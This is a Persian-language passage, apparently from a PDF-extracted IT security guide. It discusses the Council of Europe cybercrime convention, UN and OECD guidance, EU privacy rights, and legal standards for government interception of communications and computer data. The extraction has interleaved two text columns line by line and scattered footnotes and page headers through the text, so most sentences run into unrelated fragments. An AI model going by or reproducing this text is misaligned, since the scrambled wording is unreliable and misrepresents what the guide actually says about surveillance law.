‫ﺫﺧﻴﺮﻩﺷﺪﻩ ﻭ ﻳﺎ ﺣﻜﻢ ﺗﺼﺮﻑ ﻭ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘﺎﺕ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ‬ ‫ﺍﺯ ﻓﻀﺎﻱ ﺍﻳﻨﺘﺮﻧﺖ ﻧﻴﺰ ﺟﺮﻡ ﺗﻠﻘﻲ ﻣﻲﺷﻮﺩ ﻣـﻲﭘـﺮﺩﺍﺯﺩ )ﻛﺎﺭﻫـﺎﻳﻲ‬
‫ﺩﺍﺩﻩﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺎﺷﻨﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛـﺸﻮﺭﻫﺎ ﺍﺟـﺎﺯﻩ‬ ‫ﭼﻮﻥ ﺟﻌﻞ‪ ،‬ﻛﻼﻫﺒﺮﺩﺍﺭﻱ‪ ،‬ﺗﻮﺯﻳﻊ‪ ،‬ﺗﻮﻟﻴﺪ ﻳﺎ ﺩﺍﺷﺘﻦ ﺗﺼﺎﻭﻳﺮ ﻣﺒﺘﺬﻝ ﺍﺯ ﻛﻮﺩﻛﺎﻥ‬
‫ﺭﺩﻳــﺎﺑﻲ ﺑﻼﺩﺭﻧــﮓ‪ ٨٥‬ﺍﺭﺗﺒﺎﻃــﺎﺕ ﻭ ﺩﺍﺩﻩﻫــﺎﻱ ﺍﻧﺘﻘــﺎﻟﻲ ﺭﺍ ‪ -‬ﻛــﻪ‬ ‫ﻭ ﻧﻘﺾ ﺣﻘﻮﻕ ﭘﺪﻳﺪﺁﻭﺭﻧﺪﺓ ﻳﻚ ﺍﺛﺮ(‪ .‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺑﺮﺧﻲ ﻧﻈﺎﻣﻬﺎﻱ‬
‫ﻧﺸﺎﻧﺪﻫﻨﺪﺓ ﻣﺒﺪﺃ ﻭ ﻣﻘﺼﺪ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﺳﺖ ‪ -‬ﻣـﻲﺩﻫﻨـﺪ‪ .‬ﺑﺨـﺶ‬ ‫ﺣﻘﻮﻗﻲ‪ ،‬ﺑﻜﺎﺭﮔﻴﺮﻱ ﺿﻮﺍﺑﻂ ﺧﺎﺹ ﺑﺮﺍﻱ ﺟﺮﺍﺋﻤـﻲ ﻛـﻪ ﺑﻮﺳـﻴﻠﺔ‬
‫ﻣﻬﻤﻲ ﺍﺯ ﻣﻌﺎﻫﺪﺓ ﺷﻮﺭﺍﻱ ﺍﺭﻭﭘـﺎ ﺩﺭ ﻣـﻮﺭﺩ ﺟـﺮﺍﺋﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‪،‬‬ ‫ﺭﺍﻳﺎﻧﻪ ﺗﺴﻬﻴﻞ ﻣﻲﺷﻮﻧﺪ ﻏﻴﺮﺿـﺮﻭﺭﻱ ﺑﺎﺷـﺪ‪ .‬ﻫﻤﭽﻨـﻴﻦ ﻣﻤﻜـﻦ‬
‫ﺩﻭﻟﺘﻬﺎ ﺭﺍ ﻣﻠﺰﻡ ﻣـﻲﻛﻨـﺪ ﻛـﻪ ﺑـﺮﺍﻱ ﺗﺤﻘﻴـﻖ ﻭ ﺭﺩﻳـﺎﺑﻲ ﺍﺳـﻨﺎﺩ‬ ‫ﺍﺳﺖ ﺍﻳﻦ ﻗـﻮﺍﻧﻴﻦ ﺑـﺎ ﺩﺭﻧﻈـﺮ ﮔـﺮﻓﺘﻦ ﻣﺠﺎﺯﺍﺗﻬـﺎﻱ ﻧـﻪﭼﻨـﺪﺍﻥ‬

‫‪85‬‬ ‫‪Realtime Interception‬‬ ‫‪84‬‬ ‫‪Hypertext‬‬


‫‪٢٤٩‬‬ ‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ‬

‫ﺩﺭ ﻫﻤﻴﻦ ﺭﺍﺳﺘﺎ ﻣﻌﺎﻫﺪﺓ ﺷﻮﺭﺍﻱ ﺍﺭﻭﭘﺎ ﺻﺮﺍﺣﺘﹰﺎ ﻋﻨﻮﺍﻥ ﻣﻲﻛﻨﺪ ﻛﻪ‬ ‫ﺭﺍﻳﺎﻧﻪﺍﻱ‪ ،‬ﺭﺩﻳﺎﺑﻲ ﺍﺭﺗﺒﺎﻃﺎﺕ‪ ،‬ﻭ ﮔﺰﺍﺭﺵ ﻫﺮ ﻧﻮﻉ ﺛﺒﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﻪ‬
‫ﻧﻈﺎﺭﺕ ﺑﺮ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻭ ﺑﺮﺭﺳﻲ ﺩﺍﺩﻩﻫﺎﻱ ﺫﺧﻴـﺮﻩﺷـﺪﻩ ﺗـﺎ ﺣـﺪﻱ‬ ‫ﺩﻭﻟﺖ ﺍﺯ ﻗﻮﺍﻧﻴﻦ ﻭﻳﮋﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪.‬‬
‫ﻣﺠﺎﺯ ﺍﺳﺖ ﻛﻪ ﻃﺒﻖ ﺗﻌﺮﻳﻒ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺩﺭ ﻣﻨﺸﻮﺭ ﺣﻘـﻮﻕ‬ ‫ﮔﺰﺍﺭﺷﮕﻴﺮﻱ ﺍﺟﺒﺎﺭﻱ ﺍﺯ ﺩﺍﺩﻩﻫـﺎﻱ ﺫﺧﻴـﺮﻩﺷـﺪﻩ ﺩﺭ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﻭ‬
‫ﺑــﺸﺮ ﺍﺭﻭﭘــﺎﻳﻲ ﺁﻧــﺮﺍ ﻧﻘــﺾ ﻧﻜﻨــﺪ‪ .‬ﺑﻨــﺪ ‪ ۱۵‬ﻣﻌﺎﻫــﺪﺓ ﺟــﺮﺍﺋﻢ‬ ‫ﺭﺩﻳﺎﺑﻲ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﺍﻧﺘﻘﺎﻟﻲ ﺗﻮﺳـﻂ ﺩﻭﻟـﺖ ﻣﻨﺠـﺮ ﺑـﻪ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺣﺎﻭﻱ ﻧﻜﺎﺕ ﺯﻳﺮ ﺍﺳﺖ‪:‬‬ ‫ﻧﻘﺾ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺍﻓﺮﺍﺩ ﻣﻲﺷﻮﺩ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﻧﻴﺎﺯ ﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﻫﺮ ﺳﺎﺯﻣﺎﻥ ﺑﺎﻳﺪ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨـﺪ ﻛـﻪ ﺑـﻪ ﺗـﺪﻭﻳﻦ‪،‬‬ ‫‪.۱‬‬ ‫ﺍﺯ ﺭﻭﺍﻟﻬــﺎﻱ ﻣﺤــﺎﻓﻈﺘﻲ ﺑــﻴﺶ ﺍﺯ ﭘــﻴﺶ ﺍﺣــﺴﺎﺱ ﻣــﻲﮔــﺮﺩﺩ‪.‬‬
‫ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻭ ﻛـﺎﺭﺑﺮﺩ ﺍﻳـﻦ ﺭﻭﺍﻟﻬـﺎ ﺩﺭ ﺿـﻮﺍﺑﻂ ﻭ ﻗـﻮﺍﻧﻴﻦ‬ ‫ﻫﻤﺎﻧﮕﻮﻧﻪ ﻛﻪ ‪ OECD‬ﺩﺭ ﺧﻂﻣﺸﻲﻫﺎﻱ ﺧﻮﺩ ﺩﺭ ﻣﻮﺭﺩ ﺍﻣﻨﻴـﺖ‬
‫ﻣﺤﻠﻲ ‪ -‬ﻛﻪ ﺑﺮﺍﻱ ﺗﺄﻣﻴﻦ ﺣﻔﺎﻇـﺖ ﻣﻨﺎﺳـﺐ ﺍﺯ ﺣﻘـﻮﻕ ﻭ‬ ‫ﺷﺒﻜﻪ ﻫﺎ ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﺍﻇﻬﺎﺭ ﻣـﻲﻛﻨـﺪ‪" :‬ﻣﻌﻴﺎﺭﻫـﺎﻱ‬
‫ﺁﺯﺍﺩﻳﻬﺎﻱ ﺑﺸﺮ‪ ،‬ﺍﺯ ﺟﻤﻠﻪ ﺣﻘﻮﻕ ﻣﺬﻛﻮﺭ ﺩﺭ ﻣﻘـﺮﺭﺍﺕ ﺳـﺎﻝ‬ ‫ﺍﻣﻨﻴﺘﻲ ﺑﺎﻳﺪ ﺑﮕﻮﻧﻪﺍﻱ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺷﻮﻧﺪ ﻛﻪ ﺩﺭ ﺭﺍﺳﺘﺎﻱ ﺍﺭﺯﺷﻬﺎﻱ‬
‫‪ ۱۹۵۰‬ﻛﻨﻮﺍﻧﺴﻴﻮﻥ ﺷﻮﺭﺍﻱ ﺍﺭﻭﭘﺎ ﺑﺮﺍﻱ ﺣﻔﻆ ﺣﻘﻮﻕ ﺑـﺸﺮ‪،‬‬ ‫ﻣﺸﺨﺺﺷـﺪﻩ ﺍﺯ ﻃـﺮﻑ ﺟﻮﺍﻣـﻊ ﺩﻣﻮﻛﺮﺍﺗﻴـﻚ ﺍﺯ ﺟﻤﻠـﻪ ﺁﺯﺍﺩﻱ‬
‫ﺁﺯﺍﺩﻳﻬﺎﻱ ﺍﺳﺎﺳﻲ ﻭ ﺳﺎﻳﺮ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺣﻤﺎﻳﺖ ﺍﺯ ﺣﻘﻮﻕ ﺑﺸﺮ‬ ‫ﺗﺒﺎﺩﻝ ﺍﻓﻜﺎﺭ ﻭ ﺍﻳﺪﻩﻫﺎ‪ ،‬ﺟﺮﻳﺎﻥ ﺁﺯﺍﺩ ﺍﻃﻼﻋـﺎﺕ‪ ،‬ﻣﺤﺮﻣﺎﻧـﻪ ﺑـﻮﺩﻥ‬
‫ﺑﻴﻦﺍﻟﻤﻠﻠﻲ‪ ،‬ﺗﻬﻴﻪ ﺷﺪﻩﺍﻧﺪ‪ -‬ﺗﻮﺟﻪ ﻻﺯﻡ ﻛﺮﺩﻩ ﺍﺳﺖ‪.‬‬ ‫ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ‪ ،‬ﺣﻔﺎﻇﺖ ﻣﻨﺎﺳﺐ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ‪ ،‬ﻭ‬
‫ﺷﻔﺎﻓﻴﺖ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪ ".‬ﻛﻤﻴﺴﻴﻮﻥ ﺍﺭﻭﭘﺎ ﺍﻳﻨﮕﻮﻧﻪ ﺍﻇﻬﺎﺭ ﻣﻲﺩﺍﺭﺩ ﻛﻪ‬
‫ﺍﻳﻦ ﺿﻮﺍﺑﻂ ﺑﺎﻳﺪ ﺑﻪ ﻫﻤﺎﻥ ﺍﻧﺪﺍﺯﻩ ﻛﻪ ﻃﺒﻴﻌﺖ ﺁﻧﻬﺎ ﺍﻳﺠـﺎﺏ‬ ‫‪.۲‬‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺳﻴﺎﺳﺖ ﺍﺻﻠﻲ ﺍﺗﺤﺎﺩﻳﻪ ﺍﺭﻭﭘﺎ ﺍﺳـﺖ‬
‫ﻣﻲﻛﻨﺪ ﻧﻈﺎﺭﺗﻬﺎﻱ ﻗﻀﺎﻳﻲ ﻭ ﺳﺎﻳﺮ ﻧﻈﺎﺭﺗﻬـﺎﻱ ﻣـﺴﺘﻘﻞ ﺭﺍ‬
‫ﻭ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺩﺭ ﺑﻨﺪ ‪ ۸‬ﻣﻌﺎﻫﺪﺓ ﺍﺭﻭﭘﺎ ﺩﺭ ﻣﻮﺭﺩ ﺣﻘـﻮﻕ ﺑـﺸﺮ ﻧﻴـﺰ‬
‫ﺩﺭ ﺑﺮ ﺑﮕﻴﺮﻧﺪ‪ ،‬ﺑﺎﻋﺚ ﺗﻨﻈـﻴﻢ ﻛﺎﺭﺑﺮﺩﻫـﺎ ﺷـﻮﻧﺪ‪ ،‬ﻭ ﺍﺳـﺒﺎﺏ‬
‫ﻛﺎﻫﺶ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﺩﺍﻣﻨﻪﺍﻱ ﻭ ﺯﻣﺎﻧﻲ ﺭﻭﺍﻟﻬﺎ ﺭﺍ ﻓـﺮﺍﻫﻢ‬
‫ﻣﺸﺨﺺ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺑﻨـﺪﻫﺎﻱ ‪ ۷‬ﻭ ‪ ۸‬ﻣﻨـﺸﻮﺭ ﺣﻘـﻮﻕ‬
‫ﺍﺳﺎﺳﻲ ﺍﺗﺤﺎﺩﻳﺔ ﺍﺭﻭﭘﺎ‪ ٨٦‬ﺍﺣﺘـﺮﺍﻡ ﺑـﻪ ﺣﻘـﻮﻕ ﺧـﺎﻧﻮﺍﺩﻩ ﻭ ﺯﻧـﺪﮔﻲ‬
‫ﺁﻭﺭﻧﺪ‪.‬‬
‫ﺷﺨﺼﻲ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨﺼﻲ ﺭﺍ ﻋﻨﻮﺍﻥ ﻣـﻲﻧﻤﺎﻳـﺪ‪.‬‬
‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻧﻈﺎﺭﺕ‬ ‫ﺩﺭ ﺟﻮﺍﻣﻊ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻭ ﺩﺭﺣﺎﻝ ﮔﺬﺍﺭ‪ ،‬ﻧﻈﺎﺭﺕ ﺑﻲﺣـﺪ ﻭ ﻣـﺮﺯ‬
‫ﻼ ﺍﺯ‬
‫ﺩﻭﻟﺘﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻔﻬﻮﻡ ﺍﻋﺘﻤﺎﺩ ﺩﺭ ﺩﻧﻴـﺎﻱ ﺍﻳﻨﺘﺮﻧـﺖ ﺭﺍ ﻛـﺎﻣ ﹰ‬
‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‬

‫ﻣﻌﺎﻫﺪﺓ ﺷﻮﺭﺍﻱ ﺍﺭﻭﭘﺎ ﺭﻭﺍﻟﻬﺎﻱ ﻧﻈﺎﺭﺗﻲ ﺧﺎﺻـﻲ ﻛـﻪ ﻣـﺮﺗﺒﻂ ﺑـﺎ‬


‫ﺑﻴﻦ ﺑﺒﺮﺩ‪.‬‬
‫ﻣﻨﺸﻮﺭ ﺣﻘﻮﻕ ﺑﺸﺮ ﺍﺭﻭﭘﺎ ﺑﺎﺷﺪ ﺭﺍ ﻣﺸﺨﺺ ﻧﻤﻲﺳـﺎﺯﺩ‪ ،‬ﺑﻠﻜـﻪ ﺩﺭ‬
‫ﻼ ﺧﻼﺻﻪ ﺷﺪﻩ‬ ‫ﺗﺼﻤﻴﻤﺎﺕ ﺩﺍﺩﮔﺎﻩ ﺍﺭﻭﭘﺎ ﺩﺭ ﻣﻮﺭﺩ ﺣﻘﻮﻕ ﺑﺸﺮ )ﻛﻪ ﺫﻳ ﹰ‬ ‫ﻃﺒﻖ ﻗﻄﻌﻨﺎﻣﺔ ‪ ۵۵/۶۳‬ﺳﺎﺯﻣﺎﻥ ﻣﻠﻞ )ﺩﺳﺎﻣﺒﺮ ‪ ،(۲۰۰۰‬ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ‬
‫ﺍﺳﺖ( ﻗـﻮﺍﻧﻴﻦ ﻧﻈـﺎﺭﺕ ﻛـﺸﻮﺭﻫﺎﻳﻲ ﻫﻤﭽـﻮﻥ ﻛﺎﻧـﺎﺩﺍ ﻭ ﺍﻳـﺎﻻﺕ‬ ‫ﻛﺸﻮﺭﻫﺎ ﺑـﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﺗﺤﻘﻴﻘـﺎﺕ ﺭﻭﻱ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﻭ ﺩﺍﺩﻩﻫـﺎﻱ‬
‫ﻣﺘﺤﺪﻩ ‪ -‬ﻛﻪ ﺭﻭﺍﻟﻬﺎﻱ ﻗﻮﻱ ﻭ ﻣﺴﺘﻘﻞ ﺩﺭ ﻗﻀﺎﻭﺕ ﻭ ﺣﻔﺎﻇﺖ ﺍﺯ‬ ‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﻗﺎﻧﻮﻥ ﺑﻪ ﺗﺼﻮﻳﺐ ﻣﻲﺭﺳﺎﻧﻨﺪ‪ ،‬ﺑﺎﻳﺪ ﺍﺯ ﺁﺯﺍﺩﻳﻬﺎﻱ ﻓـﺮﺩﻱ‬
‫ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺩﺍﺭﻧـﺪ ‪ -‬ﺩﻳـﺪﻩ ﻣـﻲﺷـﻮﺩ‪ .‬ﺩﺭ ﺟﻮﺍﻣـﻊ ﺩﺭﺣـﺎﻝ‬ ‫ﻭ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﻧﻴﺰ ﻣﺤﺎﻓﻈﺖ ﺑﻌﻤﻞ ﺁﻭﺭﻧـﺪ‪ .‬ﺩﺭ ﺳـﺎﻝ ‪۱۹۹۰‬‬
‫ﺗﻮﺳﻌﻪ ﻭ ﺩﺭﺣﺎﻝ ﮔﺬﺍﺭ ﻛﻪ ﺩﺭ ﺁﻧﻬـﺎ ﻗـﻮﺍﻧﻴﻦ ﻣـﺸﺨﺺ ﻭ ﺗﻌﺮﻳـﻒ‬ ‫ﻫﺸﺘﻤﻴﻦ ﻛﻨﮕﺮﺓ ﺳﺎﺯﻣﺎﻥ ﻣﻠـﻞ ﺑـﺮﺍﻱ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ ﺗﺨﻠﻔـﺎﺕ ﻭ‬
‫ﺷﺪﻩﺍﻱ ﺩﺭ ﻣﻮﺭﺩ ﺗﺤﻘﻴﻖ‪ ،‬ﺗﺼﺮﻑ ﻭ ﻧﻈﺎﺭﺕ ﺑﺮ ﺩﻧﻴـﺎﻱ ﺧـﺎﺭﺝ ﺍﺯ‬ ‫ﺑﺮﺧﻮﺭﺩ ﺑﺎ ﻣﺘﺨﻠﻔـﻴﻦ‪ ،‬ﺩﺭ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻭﺷـﻬﺎﻱ ﺍﺭﺯﻳـﺎﺑﻲ‪،‬‬
‫ﺍﻳﻨﺘﺮﻧــﺖ ﻧﻴــﺰ ﻭﺟــﻮﺩ ﻧــﺪﺍﺭﺩ‪ ،‬ﻻﺯﻡ ﺍﺳــﺖ ﻛــﻪ ﺩﺭ ﺯﻣﻴﻨــﻪﻫــﺎﻱ‬ ‫ﻗﻮﺍﻧﻴﻦ ﺭﻭﺷﻦ ﻭ ﻫﻤﻜﺎﺭﻳﻬﺎﻱ ﺑـﻴﻦﺍﻟﻤﻠﻠـﻲ ﺩﺭ ﺷﻨﺎﺳـﺎﻳﻲ ﺟـﺮﺍﺋﻢ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻪ ﺗﻮﺳﻌﺔ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻗﻮﻱ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﺩﻭﻟـﺖ‬ ‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﭘﻴــﺸﻨﻬﺎﺩﺍﺗﻲ ﺭﺍ ﻣﻄــﺮﺡ ﺳــﺎﺧﺖ‪ .‬ﺩﺭ ﺳــﺎﻝ ‪،۱۹۹۵‬‬
‫ﺗﻮﺟﻪ ﺟﺪﻱ ﺷﻮﺩ‪.‬‬ ‫ﺳﺎﺯﻣﺎﻥ ﻣﻠﻞ ﺭﺍﻫﻨﻤﺎﻱ ﭘﻴﺸﮕﻴﺮﻱ ﻭ ﻛﻨﺘـﺮﻝ ﺟـﺮﺍﺋﻢ ﻣـﺮﺗﺒﻂ ﺑـﺎ‬
‫ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺑﻪ ﭼﺎﭖ ﺭﺳﺎﻧﺪ‪ .‬ﺍﻳﻦ ﺳﻨﺪ ﻣﻔﺼﻞ ﻃﻴـﻒ ﮔـﺴﺘﺮﺩﻩﺍﻱ ﺍﺯ‬
‫ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻧﻈﺎﻣﻬﺎﻱ ﭘﻴﺸﺮﻓﺘﺔ ﺣﻘﻮﻗﻲ ﺩﻧﻴﺎ‪ ،‬ﺭﺩﻳﺎﺑﻲ ﺍﺭﺗﺒﺎﻃﺎﺕ‬
‫ﻣﻮﺿﻮﻋﺎﺕ ﻣﺮﺗﺒﻂ ﺑﺎ ﺟﺮﺍﺋﻢ ﻓﻨﺎﻭﺭﻱ ﺭﺍ ﻃﺮﺡ ﻛﺮﺩﻩ ﺑﻮﺩ‪ ،‬ﺍﺯ ﺟﻤﻠـﻪ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﺠﺎﺯ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﺗﺤﺖ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺭﻭﺷﻦ ﻗﺎﻧﻮﻧﻲ؛‬
‫ﻗﻮﺍﻧﻴﻦ ﺭﻭﺍﻝﻣﻨﺪ‪ ،‬ﻗﻮﺍﻧﻴﻦ ﻣﻮﺿـﻮﻋﻪ‪ ،‬ﻫﻤﻜﺎﺭﻳﻬـﺎﻱ ﺑـﻴﻦ ﺍﻟﻤﻠﻠـﻲ‪،‬‬
‫ﻭ ﺍﻟﺒﺘﻪ ﺑﺎﺯ ﻫﻢ ﺑﺮﺍﻱ ﺁﻥ ﺑﻪ ﺩﻻﻳﻞ ﻛﺎﻓﻲ ﻧﻴﺎﺯ ﺍﺳﺖ‪ ،‬ﻛﻪ ﺍﻳﻦ ﺍﻣـﺮ‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺩﺍﺩﻩﻫﺎ‪ ،‬ﺍﻣﻨﻴﺖ‪ ،‬ﻭ ﻧﻴﺰ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ‪.‬‬
‫ﻻ ﺑﻪ ﻣﻌﻨﺎﻱ ﺗﺼﺪﻳﻖ ﻗﺎﺿﻲ ﻣﻲﺑﺎﺷﺪ‪.‬‬ ‫ﺩﺭ ﻧﻈﺎﻣﻬﺎﻱ ﺣﻘﻮﻗﻲ ﻣﻌﻤﻮ ﹰ‬
‫ﺩﻭﻟﺘﻬﺎﻳﻲ ﻛﻪ ﺑﻪ ﻣﺒﺎﺣﺚ ﺭﺩﻳﺎﺑﻲ ﻭ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺩﻩﻫﺎ ﻣﻲﭘﺮﺩﺍﺯﻧـﺪ‬
‫ﺑﺎﻳﺪ ﺑﻪ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﺟﺮﺍﻳﻲ ﺩﺳﺘﺮﺳﻲ ﺩﻭﻟـﺖ ﺑـﻪ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﻭ‬
‫‪86‬‬ ‫‪Charter of Fundamental Rights of the EU‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢٥٠‬‬

‫ﻗﺎﻧﻮﻥ ﻣﻌﻴﻦ ﻛﻨﺪ ﻛﻪ ﺗﻤﺎﻣﻲ ﺍﻓﺮﺍﺩﻱ ﻛـﻪ ﺗﺤـﺖ ﺑﺮﺭﺳـﻲ‬ ‫•‬ ‫ﺩﺍﺩﻩﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻨﺪ‪ .‬ﺗﺠﺮﺑﻴـﺎﺕ ﺑـﻴﻦﺍﻟﻤﻠﻠـﻲ‪،‬‬
‫ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ‪ -‬ﻣﺴﺘﻘﻞ ﺍﺯ ﻧﺘﻴﺠﺔ ﺣﺎﺻﻠﻪ ‪ -‬ﭘﺲ ﺍﺯ ﭘﺎﻳﺎﻥ‬ ‫ﺭﺍﻫﻨﻤــﺎﻱ ﻣﻔﻴــﺪﻱ ﺩﺭ ﺍﻳــﻦ ﻣﻮﺿــﻮﻉ ﻫــﺴﺘﻨﺪ‪ .‬ﺑــﺮ ﺍﺳــﺎﺱ‬
‫ﻛﺎﺭ ﺑﺎﻳﺪ ﺍﺯ ﺍﻧﺠﺎﻡ ﺑﺮﺭﺳﻴﻬﺎ ﻣﻄﻠﻊ ﺷﻮﻧﺪ ﻳﺎ ﻧﻪ؛ ﻭ‬ ‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻣﻠﻲ ﻭ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ‪ ،‬ﺭﻭﺷﻬﺎﻱ ﺯﻳﺮ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺭﺩﻳﺎﺑﻲ‬
‫ﻗﺎﻧﻮﻧﻤﻨﺪ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺭﺍ ﻣﻤﻜﻦ ﺳﺎﺯﻧﺪ‪:‬‬
‫ﭼﻨﺎﻧﭽﻪ ﻃﺒـﻖ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ ﻛـﺴﻲ ﺩﺭ‬ ‫•‬
‫ﺟﺮﻳﺎﻥ ﺍﻧﺠﺎﻡ ﻋﻤﻠﻴﺎﺕ ﺭﺩﻳﺎﺑﻲ ﻣـﻮﺭﺩ ﺗﺠـﺎﻭﺯ ﻗـﺮﺍﺭ ﺑﮕﻴـﺮﺩ‪،‬‬ ‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺭﺩﻳﺎﺑﻲ ﺷﻔﺎﻑ ﻭ ﻗﻮﺍﻧﻴﻦ ﺩﺭ ﺩﺳﺘﺮﺱ ﻋﻤﻮﻡ‬ ‫•‬
‫ﻃﺒﻖ ﻗﺎﻧﻮﻥ‪ ،‬ﺟﺒﺮﺍﻥ ﻛﻠﻴﺔ ﺧﺴﺎﺭﺗﻬﺎﻱ ﻭﺍﺭﺩﻩ ﺍﻟﺰﺍﻣﻲ ﺑﺎﺷﺪ‪.‬‬ ‫ﺑﺎﺷﻨﺪ؛ ﻭ ﺑﻄﻮﺭ ﻛﺎﻣـﻞ‪ ،‬ﺑـﺼﻮﺭﺕ ﺷـﻔﺎﻑ ﻭ ﺑـﺎ ﻣﻮﺷـﻜﺎﻓﻲ‬
‫ﻻﺯﻡ‪ ،‬ﺷﻬﺮﻭﻧﺪﺍﻥ ﺭﺍ ﺍﺯ ﭼﮕﻮﻧﮕﻲ ﻭ ﺷـﺮﺍﻳﻂ ﻧﻈـﺎﺭﺕ ﺁﮔـﺎﻩ‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳـﻦ ﻣـﻮﺍﺭﺩ ﺩﺭ ﺟﺮﻳـﺎﻥ ﺗﺤﻘﻴـﻖ ﻭ ﻫﻨﮕـﺎﻡ ﺗـﺼﺮﻑ‬ ‫ﺳﺎﺯﻧﺪ؛‬
‫ﻋﻮﺍﻣﻞ ﺍﺟﺮﺍﻱ ﻗﺎﻧﻮﻥ ﺩﺭ ﺩﺍﺩﻩﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ‪.‬‬
‫ﺗﺄﻳﻴﺪ ﺭﺩﻳﺎﺑﻲ ﺑﺼﻮﺭﺕ ﻛﺘﺒﻲ ﻭ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ ﻣﻘﺎﻡ ﻣﺴﺘﻘﻞ‬ ‫•‬
‫ﻧﮕﻬﺪﺍﺭﻱ ﺩﺍﺩﻩﻫﺎ ﻭ ﺳﺎﻳﺮ ﺍﺣﻜﺎﻡ ﺩﻭﻟﺖ‬ ‫)ﺗﺮﺟﻴﺤﹰﺎ ﻳﻚ ﻗﺎﺿـﻲ( ﺻﻮﺭﺕ ﮔﻴـﺮﺩ ﻭ ﺑـﺮ ﺍﺳـﺎﺱ ﺗﻘﺎﺿـﺎﻱ‬
